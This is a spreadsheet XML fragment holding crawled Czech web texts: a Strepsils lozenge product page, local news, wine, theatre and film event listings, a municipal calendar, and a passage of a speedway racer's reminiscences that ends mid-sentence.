    <t>Strepsils sleva až 20% Skladem na e‑shopu 249 Kč Bolí vás v krku? Podívejte se na řadu domácí léčby Strepsils, která vám poskytne dočasnou úlevu od bolavého a oteklého krku. Značka Strepsils nabízí širokou škálu pastilek proti bolesti v krku, které ji zklidní a bojují proti ní. O bolesti v krku Hrdlo začíná v zadní části ústní dutiny a pokračuje do horních cest dýchacích a trávicího traktu a skládá se ze tří částí: mandle, hltan a hrtan. Dalo by se na něj pohlížet jako na dálnici, po níž putují vzduch, prach a potraviny, ale s filtračním pruhem pro všechny bakterie, viry a další dráždivé látky, které do něj mohou proniknout. Úloha hrdla spočívá v zachycení těchto dráždivých látek a jejich vypuzení dříve, než způsobí další potíže. Tento proces může vést k zánětu v krku nebo infekci hrdla. Bolesti v krku jsou běžné zejména u dětí a mladistvých, a to především proto, že mladí lidé si ještě nevytvořili imunitu proti mnoha virům a bakteriím, které mohou bolesti v krku způsobit. Příčiny bolesti v krku Bolest v krku je často známkou toho, že můžete mít v této oblasti infekci, ale podráždění hrdla, zarudnutí a otok mohou mít i jiný původ – například cigaretový kouř, znečištěné životní prostředí, namáhané hlasivky a dokonce i změny teploty vzduchu. Existuje spousta příznaků bolesti v krku a infekce hrdla, od ošklivé škrábavé bolesti při polykání k náhlému chraplavému hlasu. Bolesti v krku navíc mohou provázet další příznaky, jako například: Rýma Oteklé uzliny Bolest hlavy Bolesti svalů a kašel Problémy s krkem jako například zánět (zarudnutí a otok) hrdla - může jít o bolest pouze na jedné straně Na trhu naštěstí existuje spousta léků proti bolesti v krku. Existují léky, které mohou pomoci uklidnit bolest, a jejich účinek může pokračovat i poté, co se pastilka rozpustí. Strepsils pastilky patří do této zmíněné skupiny. Jak se vyhnout bolestem v krku To nejlepší, co můžete udělat, je na prvním místě zabránit infekci nebo podráždění krku. Ale kdo z nás si v dnešní uspěchané době může dovolit zůstat doma pokaždé, když zaslechne, že se v jeho okolí objevily problémy s bolavým krkem? Pokud chcete mít v boji s bolestmi v krku šanci, zkuste následující: Vyhněte se kontaktu s těmi, kteří trpí bolestmi v krku. Vyhněte se dráždivým látkám, které mohou způsobit zarudnutí a otok. Uvědomte si, že cigaretový kouř, znečištění, zvyšování hlasu nebo dokonce změny klimatizace (pokud jde o krk, není klimatizace rozhodně váš přítel). Dýchejte nosem. Váš nos funguje jako vynikající filtr bakterií a jiných škodlivých dráždivých látek a pomáhá ohřívat vzduch, který nasáváte do plic. Upravte svůj jídelníček – důležité vitamíny v ovoci a zelenině pomohou podpořit váš imunitní systém. Omezte kouření a vyhýbejte se cigaretovému kouři jiných. Pravidelně polykejte. Sliny, které se tvoří ve vašich ústech, pomáhají při "proplachování" hrdla. Hodně pijte – doušek vody pomůže zmírnit sucho v krku. Léčba vaší bolesti v krku Pokud již máte bolesti v krku, máte hned několik možností, jak dosáhnout toho, abyste se vy a váš krk cítili lépe: Pijte hodně teplých tekutin, abyste zůstali zavodnění. Snažte se dýchat nosem. Pokud cítíte, že je váš nos ucpaný, inhalujte páru z misky s horkou vodou, pomůže to odstranit překážku, nebo zkuste pastilku, která obsahuje dekongescens. Snažte se vyhnout alkoholu . Představa, že alkohol "desinfikuje" hrdlo, je bohužel mýtus! Ve skutečnosti je mnohem pravděpodobnější, že pokud se napijete alkoholu , bolest v krku spíše zhoršíte. Polykejte – možná to bude bolet, ale je to jedna z nejlepších věcí, které můžete udělat, protože sliny jsou přirozený způsob, jak se bolesti v krku zbavit. Cucání pastilky s léčivým účinkem pomáhá zvlhčit sliznice krku a přináší znatelnou úlevu. Pokud si navíc vyberete jednu z řady Strepsils, budou účinné látky fungovat i poté, co se pastilka rozpustí. Z jakých druhů Strepsils pastilek lze vybírat? Pokud se objeví škrábání nebo podráždění krku, zkuste pastilky Strepsils Med a Citron, protože jeho složky a přidaný přírodní med můžou vyřešit vaši bolest v krku. Při škrábání v krku nebo jeho podráždění pastilky Strepsils Pomeranč s Vitaminem C jsou účinné proti bolesti v krku a posilují odolnost organismu. Přidaný Vitamín C napomáhá zvýšit odolnost organismu vůči infekcím. Strepsils Citron je bez cukru a proto ho mohou užívat i diabetici. Při škrábání v krku nebo jeho podráždění pastilky Strepsils Mentol a Eukalyptus zmírní pocit ucpaného nosu a tlumí kašel. Při škrábání v krku nebo jeho podráždění dvě účinné látky obsažené ve Strepsils Plus pastilkách a spreji zabraňují šíření infekce a mají anestetický účinek díky lidokainu. Strepsils dávkování, způsob užívání, a zda je možné použít k léčbě bolesti v krku Strepsils v těhotenství, se dozvíte v příbalovém letáku u každého z přípravků.</t>
  </si>
  <si>
    <t>101330</t>
  </si>
  <si>
    <t>87580</t>
  </si>
  <si>
    <t>20241101_617_3239958042_3acc25bec19da64302bf.html</t>
  </si>
  <si>
    <t>3acc25bec19da64302bf</t>
  </si>
  <si>
    <t>Souhrn událostí uplynulého dne – 31.10. 2024</t>
  </si>
  <si>
    <t>Souhrn událostí uplynulého dne – 31.10. 2024 01.11.2024 | Agris ČSÚ: Vývoz zvířat z Česka v 1. pololetí vzrostl o 13 procent na 5,1 mld. Kč Z České republiky se v letošním prvním pololetí vyvezla živá zvířata za 5,1 miliardy korun, meziročně to byl nárůst asi o 13 procent. Nejvíce - asi třemi miliardami korun - se na exportu podílel hovězí dobytek. Hodnota vývozu ovcí a koz činila 2,1 milionu korun. Jihomoravské minipivovary připravily podzimní a zimní speciály Jihomoravské minipivovary v těchto dnech nabízejí nebo připravují speciály pro podzimní i zimní sezonu. Tradičně jsou tyto speciály silnější než běžná piva a obsahují neobvyklé přísady, v posledních letech ale roste poptávka po slabších pivech a někteří sládci na ni reagují nabídkou speciálů s nižším obsahem alkoholu . Společnost Top Hop z koncernu Agrofert koupila pěstitele chmele Lupofyt, který sídlí v Chrášťanech na Rakovnicku . Podnik se věnuje i dalším oblastem rostlinné výroby. Top Hop tím posílil pozici jednoho z nejvýznamnějších pěstitelů chmele v Česku. Úplné texty zpráv a další události včerejšího dne naleznete zde.</t>
  </si>
  <si>
    <t>20241101_618_3239957994_d05f5a5f6bac9137a991.html</t>
  </si>
  <si>
    <t>d05f5a5f6bac9137a991</t>
  </si>
  <si>
    <t>Roland Schimmelpfennig - Discoteca Paraiso (Činohra)</t>
  </si>
  <si>
    <t>Roland Schimmelpfennig - Discoteca Paraiso (Činohra) Úvod &amp;gt; Akce v Ostravě &amp;gt; Divadlo &amp;gt; Roland Schimmelpfennig - Discoteca Paraiso Roland Schimmelpfennig - Discoteca Paraiso Tuhle noc bude všechno jinak 01. listopadu 2024 19:00 Divadlo 12 „A tak tancujeme, objímáme se, beze slov, víme, co tu hledáme, a víme oba, že to, co tady hledáme, není to, co hledáme doopravdy." Noc je ještě mladá. Před dveřmi klubu stojí Černý pes. Pustí tě do ráje? Pokud ano, nedá se to už zastavit. Všechno duní. Všechno se hýbe. Všude je cítit pot. Alkohol koluje v žilách. Lidé se ztrácí v mlze a stroboskopech. A mezi nimi pět barmanů, dva Italové, tři Bulhaři, čtyři blondýnky z Kanady , třicet Španělů, dvacet čtyři Francouzů, neznámý dřevorubec, žena z Východu, sedmapadesátiletý Rus a mnoho dalších. Globalizace dorazila do ráje. A uprostřed beatů a náhodných rozhovorů vznikají okamžiky blízkosti, které dávají zapomenout, že kouzlo platí pouze pro tuto jednu noc. Roland Schimmelpfennig důmyslně propojuje pulzující energii taneční klubové scény se životy jejích různorodých postav. Kluby se v jeho podání stávají symbolickými prostory sbližování i odcizení. Ocitli jsme se v ráji, nebo v pekle? 460,- 50% sleva pro ZTP, ZTP-P, studenty, učitele a seniory MÍSTO AKCE DALŠÍ AKCE v místě (66) Autor: web Autor person web</t>
  </si>
  <si>
    <t>2210</t>
  </si>
  <si>
    <t>1150</t>
  </si>
  <si>
    <t>20241101_619_3239958117_6bf33f7589bf7789d44f.html</t>
  </si>
  <si>
    <t>6bf33f7589bf7789d44f</t>
  </si>
  <si>
    <t>https://www.praha-lysolaje.cz/kalendar/day/2024-11</t>
  </si>
  <si>
    <t>Shrnutí https://www.praha-lysolaje.cz/kalendar/day/2024-11 Pátek, Listopad 1, 2024 « Předchozí Další » 3.11.2024 9:00 - 12:00 ul. Hřebenová (u č. 16) Přistavení kontejneru na bioodpad 4.11.2024 8:00 - 10:00 ul. Květová, ZO Laťka Přistavení kontejneru na bioodpad. 11.11.2024 8:00 - 10:00 Lysolajské údolí u čp 115/33 (u mostku) Přistavení kontejneru na bioodpad. 12.11.2024 17:00 Keramika pro všechny 13.11.2024 18:00 Zasedání Zastupitelstva MČ Praha - Lysolaje Konání 18. zasedání Zastupitelstva MČ Praha - Lysolaje . Místo konání: Komunitní centrum Cihla, přízemí, U Libosadu 387/1, Praha - Lysolaje , PSČ 165... 14.11.2024 18:00 - 18:15 ul. Hřebenová 181/16 - nebezpečný odpad Přistavení kontejneru na nebezpečný odpad. 14.11.2024 18:45 - 19:00 křižovatka Žákovská x Starodvorská - nebezpečný odpad Přistavení kontejneru na nebezpečný odpad. 18.11.2024 8:00 - 10:00 ZO zavážky - prostřední ulice Přistavení kontejneru na bioodpad 19.11.2024 14:00 - 18:00 Žákovská x Starodvorská (u samoobsluhy) Přistavení velkoobjemového kontejneru. 21.11.2024 18:30 Lysolajský kvíz v KC Cihla PŘIJĎTE SI S OTESTOVAT SVÉ ZNALOSTI NA LYSOLAJSKÝ KVÍZ A OCHUTNAT LYSOLAJSKÉ VÍNO 25.11.2024 8:00 - 10:00 Hřebenová 181/16 Přistavení kontejneru na bioodpad 26.11.2024 17:00 Keramika pro všechny</t>
  </si>
  <si>
    <t>74</t>
  </si>
  <si>
    <t>20241101_62_3264328358_0ff250958e2ca44e9497.html</t>
  </si>
  <si>
    <t>0ff250958e2ca44e9497</t>
  </si>
  <si>
    <t>Na předávání státních vyznamenání si hosté připíjeli tím nejlepším od moravských a českých vinařů</t>
  </si>
  <si>
    <t>Na předávání státních vyznamenání si hosté připíjeli tím nejlepším od moravských a českých vinařů Na předávání státních vyznamenání prezidentem 28. října ani letos nechyběla vína z Moravy a vína z Čech . Ve Španělském sále Pražského hradu si zhruba tisícovka hostů mohla vychutnat celkem devět vín z aktuální kolekce Salonu vín. Pohoštění pro oceněné věnoval Vinařský fond. „Pro Vinařský fond je velkou poctou, že může oceněným lidem na slavnostním ceremoniálu nabídnout výběr ze stovky nejlepších vín naší země. Těší nás, že se to už stalo tradicí. Naše vinařství má více než tisíciletou historii a naše vína jsou proto tím správným nápojem pro takový okamžik,“ řekl ředitel Vinařského fondu Zbyněk Vičar. Fond vína nakoupil ze Salonu vín, který spravuje Národní vinařské centrum. To zajistilo i jejich náležitou prezentaci na místě. „Jsme velmi rádi, že si i letos si chvilku na ochutnání našel pan prezident. U vína jsme si popovídali například se Zlatou Adamovskou a Petrem Štěpánkem a o své zkušenosti s prezentací vína se s námi podělil pan Ladislav Špaček ,“ popsal výjimečné okamžiky ředitel Národního vinařského centra Lubomír Maťák Vína na hradě hostům rozlévali zástupci vinařství v čele s národní someliérkou Klárou Kollárovou. „Selekce byla, jak je již zvykem, z vín Salonu vín ČR. Josef a Marek Svobodovi představili své rosé, zatímco Petra a Kamil Prokešovi nabídli svou Frankovku. U bílých vín byly zastoupeny hlavně naše typické odrůdy – Veltlínské zelené, Müller Thurgau, Ryzlink vlašský, Ryzlink rýnský a Pálava – a také rosé a tři červená,“ uvedla k akci v Senátu národní sommelierka Klára Kollárová. „U příležitosti státního svátku České republiky a předávání státních vyznamenání prezidentem České republiky jsme měli tu čest reprezentovat výběr Salonu vín Frankovkou 2021, pozdní sběr, která je zařazena mezi 100 nejlepších vín České republiky . Bylo nám ctí se této slavnostní recepce, kde naše víno ochutnalo mnoho významných a známých osobností, kteří ocenili vysokou úroveň nabízených vín, zúčastnit“ uvedl Kamil Prokeš Kamil Prokeš vinařství ve Velkých Pavlovicích . Vinný lístek na slavnostní recepci na Pražském hradě zahrnoval Veltlínské zelené 2021, pozdní sběr ze Zámeckého vinařství Bzenec , Müller Thurgau 2022, pozdní sběr z vinařství Znovín Znojmo, Ryzlink vlašský 2022, pozdní sběr z vinařství Mikrosvín Mikulov, Ryzlink rýnský 2021, pozdní sběr z Víno Mikulov , Pálava 2022, výběr z hroznů z vinařství Štěpán Maňák, André rosé 2022, pozdní sběr z Vinařství Svoboda, Frankovka 2021, pozdní sběr z vinařství Kamil Prokeš , Alibernet 2021, pozdní sběr z vinařství Stanislav Konečný a Cabernet Moravia 2021, výběr z hroznů z Vinařství U Kapličky. Salon vín – Národní soutěž vín ČR je finální soutěží systému Národní soutěže vín. V rámci soutěže je každý rok vybráno nejlepší víno s titulem „Šampion", dále „Vítězové kategorií" a „Nejlepší kolekce". Sto nejlepších vín soutěže je oceněno zlatou medailí Salonu vín ČR. Na vlastní soutěž navazuje celoročně otevřený veřejný degustační Salon vín – expozice nejlepších sta vín, umístěná ve sklepních prostorách státního zámku ve Valticích , která já návštěvníkům otevřena vždy od února do prosince. Autor: (c) 2013 - 2024 WDF s.r.o. - wdf@wdf.cz || Autor: | TZ, red || TZ, red Rubrika transition_slide Lifestyle / Zdraví</t>
  </si>
  <si>
    <t>4900</t>
  </si>
  <si>
    <t>20241101_620_3239915639_45835cf9dba1bdcc5243.html</t>
  </si>
  <si>
    <t>45835cf9dba1bdcc5243</t>
  </si>
  <si>
    <t>Město Blovice</t>
  </si>
  <si>
    <t>Město Blovice Kdy: 26. 11. 2024 17:00 Kde: Lidový dům Blovice Beseda na téma "Život s vášní, čokoládou a vínem". Typ akce: ostatní (přednáška, přednáška) Beseda o čokoládě Lidový dům Blovice, Bělohrobského 78, Blovice , 33601 Souřadnice GPS: 49° 34′ 59.01″N 13° 32′ 24.916″E Plné vstupné: 100 Kč Datum vložení: 22. 8. 2024 11:52 Datum poslední aktualizace: 15. 10. 2024 12:51 Autor: Správce Webu Autor: Autor: || Blovice || Správce Webu</t>
  </si>
  <si>
    <t>284</t>
  </si>
  <si>
    <t>20241101_621_3239872168_1d4bdd6430adc8a30d18.html</t>
  </si>
  <si>
    <t>1d4bdd6430adc8a30d18</t>
  </si>
  <si>
    <t>Butch Cassidy and Sundance Kid ve vinařství SPIELBERG (Vinařské akce, Ostatní)</t>
  </si>
  <si>
    <t>Butch Cassidy and Sundance Kid ve vinařství SPIELBERG (Vinařské akce, Ostatní) Butch Cassidy and Sundance Kid ve vinařství SPIELBERG Datum vinařství SPIELBERG [ mapa ] Popis Vinařství SPIELBERG vás zve na správnou komedii s názvem Butch Cassidy and Sundance Kid v podání Simony Vrbické , Josefa Poláška a Václava Kopty. Ta se koná 2. listopadu 2024 od 19.00 hod. v Křišťálovém sálu vinařství. Do vinařství na sklenku vína přijďte však už od 17.00 hod. Záznamy 1–5 z 217 Tip na víno ke koupi u vinaře 25. 1. 2024 „Zakoupeno přes Mojelahve. 171,- Barva tmavě zlatá až oranžová. I ve vůni a chuti se blíží oranžovému vínu. Vůně tedy silně kořenitá až technická, komplexní. Chuť plná, aromatická, polévková. Jsou tam třísloviny, celkem znát i dřevo. Přes poměrně velké množství alkoholu se dost dobře pije, možná až moc dobře, takže celkem rychle odeznívá. V doznívání zase vystupuje dřevo a dojem oranžového vína . Neurovnané, ale zajímavé.“ /100 11. 10. 2024 „Cyklozastávka u pana Špalka v Novém Šaldorfu, toto byl druhý vzorek, který nám pan Špalek dal ochutnat, a paráda, nádherná zlatavá barva, ve vůni náběh na petrolejové tóny, v chuti pěkné kyseliny, krásně strukturované, pěkně patrný sud. Nádhera.“ /100 28. 6. 2023 „Velmi příjemné a dobře pitelné, zvláště mě u tohoto vína bavil ten dotyk sudu, který dával chardonnay vanilkový nádech.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20241101_622_3239872238_ecc8b465ddd96d518124.html</t>
  </si>
  <si>
    <t>ecc8b465ddd96d518124</t>
  </si>
  <si>
    <t>Podzimní otevřené sklepy 2024 (pořádá Vinařský spolek)</t>
  </si>
  <si>
    <t>Podzimní otevřené sklepy 2024 (pořádá Vinařský spolek) 09. 11. 2024 10:00 – 10. 11. 2024 12:00 Vinařský spolek Moravská Nová Ves zve všechny vinaře, příznivce i milovníky kvalitního moravského vína v sobotu 9. listopadu 2024 v době od 10.00 do 19.00 hodin a v neděli 10. listopadu 2024 v době od 10.00 do 12.00 hodin do autentických prostor sklepních uliček U nádraží , Výmol a Zátiší v Moravské Nové Vsi k návštěvě přibližně 30 otevřených vinných sklepů a sklípků. Naši vinaři si pro Vás připraví kompletní nabídku nových svěžích vín ročníku 2023, která bude doplněna o vína starší dle aktuální nabídky v jednotlivých sklepích. Jako vždy na podzim budete mít také možnost ochutnat některá mladá vína z aktuální sklizně v různých stupních jejich vývoje. Vstupné bylo stanoveno na 800,- Kč v předprodeji (do 13. října 2024 včetně) nebo 900,- Kč na místě. Vstupenka zahrnuje: vstupné do areálu vinných sklepů, skleničku s logem, katalog otevřených sklepů s orientační mapkou a propiskou na poznámky, kulturní program s vystoupením cimbálové muziky, volnou degustaci v jednotlivých otevřených sklepech v sobotu 9. listopadu 2024 v době od 10.00 do 17.30 hodin; po uplynutí této doby si můžete předem ochutnaná vína u vinařů zakoupit nebo použít kupóny na nákup vína v lahvích a pokračovat v zábavě u cimbálové muziky:-) 4 poukázky na nákup vína v celkové hodnotě 400,- Kč (4x poukázka v hodnotě 100,- Kč). Další informace na webu spolku zde. Autor: Origine solutions</t>
  </si>
  <si>
    <t>114</t>
  </si>
  <si>
    <t>106</t>
  </si>
  <si>
    <t>20241101_623_3239871945_d9bf23d58723197675c5.html</t>
  </si>
  <si>
    <t>d9bf23d58723197675c5</t>
  </si>
  <si>
    <t>ANORA</t>
  </si>
  <si>
    <t>Shrnutí ANORA Areál Eurocentra, Jablonec nad Nisou 2.11.2024 od 19:00 hodin filmové představení Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. 2024 | USA | 139 min | komedie, drama | Nepřístupné pro děti do 15 let | Režie: Sean Baker | Hrají: Mikey Madison, Mark Ejdelštejn, Jurij Borisov, Karren Karagulian, Darja Ekamasova, Paul Weissman, Vache Tovmasyan, Vincent Radwinsky, Ivy Wolk, Lindsey Normington | Proč by sexuální pracovnice nemohla toužit po opravdové lásce? Anora (Mikey Madison) je ještě tak naivní, že takový sen má. Když si ji v jejím „mateřském“ klubu objedná mladý, bohatý a divoký Rus Ivan (Mark Eidelshtein), vsugeruje si, že právě on je ten pravý. Jejímu životnímu rozhodnutí bude předcházet pestrá série sexuálních čísel, několik lajn koksu, spousta vypitého alkoholu a pár dnů strávených v Ivanově pronajatém luxusním domě. A protože moloděc je taky docela střelec, po týdenní známosti spolu frčí do Las Vegas , aby se tu mohli vzít. Že by potom měli žít šťastně až do smrti? Ani omylem. Ivanovi rodiče jsou ruští oligarchové, kteří nevycválaného synka uklidili do Ameriky před problémy, jež doma v Rusku způsobil. Synův sňatek s americkou prostitutkou ale považují za největší lumpárnu, jakou jejich synáček dosud provedl, a samozřejmě ho chtějí anulovat. Po dobrém či po zlém. Jenže jejich nová snacha je životem otřískaná holka, která se jen tak ničeho nezalekne a o svůj šťastný konec je připravená se porvat. Doslova. Autor: as4u.cz, s.r.o.</t>
  </si>
  <si>
    <t>1280</t>
  </si>
  <si>
    <t>20241101_624_3239871941_902ff6c9c8c284c05653.html</t>
  </si>
  <si>
    <t>902ff6c9c8c284c05653</t>
  </si>
  <si>
    <t>Říjen</t>
  </si>
  <si>
    <t>Říjen 31.10.2024 Štipoklasy – 31. října Výstava Racing Expo v pražských Letňanech si opět vytkla za cíl nabídnout návštěvníkům komplexní pohled na český motoristický sport. Bohužel plochá dráha zůstala poněkud stranou. Nicméně Zdeněk Schneiderwind si v sobotu přišel pro významné ocenění. Zdeněk Schneiderwind si převzal cenu Legenda motosportu | foto Žofie Schneiderwindová Návštěvníkům se nabídl pohled na ledařské motocykly z produkce KLABO Factory. Zdeněk Schneiderwind si společně s motokrosařem Zdeňkem Velkým a šlapačkářem Václavem Budínem převzal cenu Legenda motosportu. Ledařské speciály Antonína Klatovského přiblížily návštěvníkům sport levých zatáček | foto Zbyněk Nejezchleba 30.10.2024 Plzeň – 26. října V sobotu na stadionu proběhlo rozloučení s letošní plochodrážní sezónou. Po obědě na obě dráhy vyjely všemožné motocyklové stroje a mezi nimi dokonce i motokrosová sajdkára. Samozřejmě nechyběly plochodrážní speciály. Plzeň se loučila se sezónou | foto Leoš Jaren Sajdkárkrosový motocykl nebývá na oválech často ke spatření | foto Leoš Jaren Kromě Matěje Frýzy si po několika letech za řídítka plochodrážky sedl také Radek Podhadský. Svého mladšího bratra Petra později na dráze přijel sledovat účastník Speedway Grand Prix 2025 Jan Kvěch a spolu s ním Zdeněk Simota. Na malý ovál s trialkou vyjel Pepa Černý a nejmladší jezdci sobotní rozlučky. Poté co si všichni zájemci dosyta užili ježdění, následovala volná zábava s občerstvením a hudbou, která se protáhla až do pozdních hodin, kdy se spokojení účastníci postupně rozjížděli do svých domovů. Nechyběl ani Jan Kvěch | foto Leoš Jaren 29.10.2024 Liberec – 27. října Na stadiónu ve Starých Pavlovicích se v neděli odehrálo BUŘTOBRANÍ. Na ploché dráze se sešla parta starých jezdců posílena borci, kteří se starají o náš stadion při závodech. Ve znamení výborných buřtů, sekané, koláčů a spousta pití probíhalo odpoledne. Josef Herda a Josef Kalous | foto GRS Liberec Samozřejmě se také jezdilo vším, co mělo kola. Na setkání se také dostavil náš nejstarší závodník ze sedmdesátých let reprezentující Liberec Josef Herda , který sedmého listopadu oslaví třiadevadesát let. Jako junior nescházel Josef Kalous se svými dvaaosmdesáti roky. Počasí i zábava klapla a tak zase zas v létě! Bývalá liberecká plochodrážní garnitura se sešla ve Starých Pavlovicích | foto GRS Liberec 28.10.2024 V cukrárně na náměstí v Bílině vám umí divy nejen se svou vlastní domácí šlehačkou! Ale najednou se dveře otevřou dokořán a malá místnost je rázem plná bratrů Svobodových. Stanislava a mladšího Jiřího. Rychle, spěchej, za pár minut je sraz. Na parkovišti pod Znělcovou horou, jak se také tady říká výraznému vrchu Bořeň. Již tu čekají Jaroslav Zobal a Petr Podhola, abychom si vyprávěli o dobách, kdy plochou dráhu pod Krušnými horami nezastupovaly pouze Chabařovice . Tři kamarádi na speedwayA-Z: Josef Kalous, Petr Podhola a Jaroslav Zobal V devětašedesátém pořídil dnes již neznámý fotograf v Polepech snímek tří plochodrážních kamarádů. Dnešní příběh Petra Podholy doplňuje dříve vydaná vyprávění Jaroslava Zobala a Josefa Kalouse. Od pionýra k plochodrážnímu ESu „Jezdil jsem soutěže a motokrosy na pionýru,“ vrací se Petr Podhola k úplným začátkům své kariéry motocyklového závodníka. „Měli jsme tu BISVAPI, což znamenalo Bílinský svaz pionýrů. Tady byl terén třeba v Teplicích . V Krupce jsme jeli soutěž a mně se cestou motorka rozbila.“ Petr Podhola by se opět stal plochodrážním závodníkem | foto Antonín Škach Tehdy se pochopitelně na takové podniky cestovalo po ose. „Zadřel jsem motor,“ vybaví si. „Rozebral jsem ho. Pístní kroužky! Jeden byl zdravej, tak jsem to spravil. Odjel jsem soutěž a ještě na se na tom pionýru vrátil domů.“ Krupka byla ale v půlce šedesátých let jednou z výrazných lokalit československé ploché dráhy, kde se pořádaly i vrcholné podniky kalendáře. V podhůří Krušných hor šlo prakticky o jedinou trať levých zatáček. Nejdek či Karlovy Vary skončily s koncem vlny závodů sériových strojů. Žatecká závodní historie byla rovněž minulostí. Chomutov čekal na první ze svých renesancí, provizorní ovál v ústeckém Bukově na zrození. „V Krupce to byl atletickej a fotbalovej stadión,“ vybaví si Petr Podhola. „Moc hezkej. Depo bylo pod stadiónem, dnes tam stojí plaveckej bazén. Jenže jeden zapšklej dědek se postavil proti ploché dráze. Přitom tam byly pěkné akce. Třeba soustředění reprezentace. Luboš Tomíček si tehdy dal rozpůlené pingpongové míčky do očí. Když šly kolem ženský, bouchnul do nich, jako že by vypadly oči.“ Petr Podhola usedl prvně za řídítka plochodrážního motocyklu někdy okolo svých dvacet. „V dvaašedesátým,“ upřesní. „Táta Svoboda , řek‘, že bude trénovat v Žatci . Jel jsem tam s ním a poprvý jsem si na to sed‘.“ Vzestupy i pády Mladý muž ale musel řešit zbrusu odlišné starosti než motocyklové závody. „Na vojně jsem si odsloužil dva měsíce navrch,“ pokrčí rameny. „Byl jsem u pohraničářů, sloužil jsem u Varnsdorfu , fungovalo tam staromazáctví. Pak mě odveleli na děčínskou brigádu, prdli mě na pojízdnou dílnu.“ Polepy léta páně 1966, Petr Podhola stojí na nástupu první zleva, druhý zprava je Jaroslav Zobal | foto archív Petr Podhola Zkušenosti se mladému záklaďákovi měly chodit i v pozdějším životě. „Náš šéf byl kapitán, starej fronťák, domlouval nám kšefty,“ dozvídáme se. „Udělali jsme je, šli jsme na pivo a on nám rozdělil i zbytek peněz. Byl to takovej náš táta. Hlavně jsem dělal řemeslo. Prodloužilo se nám to, protože pohraničník sloužil šestadvacet měsíců místo běžných čtyřiadvaceti, ale já si na vojnu nestěžuju. Přišel jsem domů a zval bráchu na pivo . Nemůžu, nemám peníze. Otevřel jsem šrajtofli a byla plná.“ Známé plochodrážní historické prameny poprvé zaznamenaly jméno Petr Podhola v šestašedesátém. Program kontrolního a vyzývacího závodu v Polepech závodníka z Bíliny uvádí v kolonce se startovním číslem pět. Zda se jednalo skutečně o jeho první závod, netuší dnes ani on sám. „Nevzpomenu si, není mi už šestnáct,“ říká. „Je to už šedesát let zpátky a já už nevím, co bylo včera. Jsem po operaci srdce, měnili mně chlopeň, v únoru to bylo přesně rok. Pořád jsem jezdil za Ústí. Od začátku do konce. Když nebyly závody, byly srandy. A taky úrazy.“ Ty bohužel k ploché dráze patří jako tmavá noc k oslnivému dni. „V Kopřivnici jsem hákem proříz‘ mantinel,“ souhlasí. „Měl jsem zlomenou patní kost. Jindy jsme jeli v Chabařovicích . Lehnul jsem, přejel mě Pepík Fišer. Vzadu na hlavě jsem měl díru.“ Návštěva nemocnice byla nevyhnutelná. „Doktor mi ránu zašil,“ pokračuje Petr Podhola. „A říká, zůstanete tady. Jenže já měl dole auto a v něm manželku. Tak to jo. Odjel jsem domů a hodinu měl okno.“ Pacient přišel záhy k rozumu a poznání, že rány do hlavy se nepodceňují. „Druhej den jsem šel zpátky do nemocnice a ten stejný doktor mě vyhodil,“ přiznává, že se se zlou potázal. „Včera jste mně utek‘, nemám se s váma, o čem bavit.“ Nejen klika od gramofonu se točí a točí Plochodrážníci z Ústí nad Labem na území svého města marně hledali azyl, který našli v Polepech nad dohled od Litoměřic . „Po vojně jsem tady začínal,“ vrací se na práh své opravdové plochodrážní kariéry. „Vyrobil jsem Čochtana. Z rámu Manet a motoru dvěstěpadesátky péráka. Udělal mi sání do esíčka, naplnil jsem to dentakrylem, byl to motor Slávy Fajta. Nováčkové na to sedli a zkusili si plochou dráhu, vyrobil jsem to v garáži a jezdilo to.“ Čochtan stál mimo jiné i na počátku kariéry Jiřího Štancla a doba si ostatně různé improvizace přímo vyžadovala. „Jarda Smoček vozil plochodrážku postavenou v sajdkáře,“ poslouží příkladem. „Já zase neměl, na čem jet do Chomutova . Půjčil jsem si dvěstěpadesátku péráka a motorku dal za něho. Jednou jsem šel za tátou, ať mi půjčí auto. Na co? Máme závody… Tak to zapomeň. Kdybys jel za holkou, tak jo, ale na plochou dráhu ne, na to zapomeň.“ Petr Podhola v akci v první půli sedmdesátých let | foto archív Petr Podhola Naštěstí pomohli starší kolegové. „Táta Svoboda měl předválečného mercedes sto sedmdesátku,“ můžeme se těšit na další historku. „S mechanikem Slávou Fajtem jsme jeli do Polep. Motorky jsme měli na vlečňáku. Přijíždíme do Velemína . Je tam vlečka? ptal se řidič. Jo. Najednou rána. Vlečňák se utrh‘ a opřel se do stromu:“ Přes bývalé závodníky se daly sehnat také věci, jež u nás byly nedostupné. „Od Richarda Janíčka jsem koupil kombinézu,“ přibližuje Petr Podhola. „Jeli jsme ze závodů s panem Volfem a stavili se u něho. Jen jsem plácnul, jestli nemá kombinézu. Měl a já ji koupil.“ Zážitků byla spousta. „Měli jsme kámoše v Mikulově ,“ dozvídáme se. „Když se jelo v Břeclavi nebo v Březolupech, přijel za námi s vínem . A po závodech nás pozval k sobě do sklípku. Do Chomutova jsem vzal gramofon s klikou. Východní Němci tam chodili na tanečky. Každou chvíli se objevil nějaký z nich, ať zatočím klikou. A já točil a točil.“ Život je prostě nádherný a musí se prožít naplno. „Na soustředění v Polepech jsme šli vedle do Encovan krást májku,“ máme tu další zážitek z úst hrdiny našeho článku. „Pepa Kalous řek‘, že ji tam mají. Dorazili jsme o půlnoci a šli do akce.“ Nechat si ukrást májku je pro její stavitele obrovská potupa. „Najednou se rozsvítila světla,“ dostáváme se do finále. „Štěkal pes, dokonce se střílelo. Dvoumetrovej plot jsem přeskočil, ani nevím jak. Utíkali jsme a sešli se až po pár kilometrech. Pepa brečel, že tam zapomněl tátovu pilu.“ Vždycky Ústí Severočeská plochá dráha nemá prozatím rozkrytou svou historii tak dokonale jako v jiných klubech. „Vždycky jsem jezdil za Ústí,“ vyznává se Petr Podhola. „Od začátku až do konce. Skončil jsem, že jsem byl starej. Mrzelo mě, že jsem nezačal dřív.“ S jeho jménem se setkáváme ve výsledkových listinách národní kvalifikace, tehdejší obdoby současného přeboru, či volných podnicích. Ale především v ligových kláních. Ústecký celek nemohl chybět při Poháru Světa motorů, jímž se k nám roku 1967 vrátilo pravidelné zápolení plochodrážních družstev. Petr Podhola v Bílině v třiasedmdesátém | foto archív Petr Podhola Severočeši tehdy skončili druzí ve skupině B za žižkovskou Viktorií, která se nakonec v prosincovém finále pyšnila porážkou Rudé hvězdy. Napřesrok se liga do Československa vrátila oficiálně a Ústečané byli druzí. V sezóně 1969 třetí. Bronz dali rovněž po přechodu ke stylu 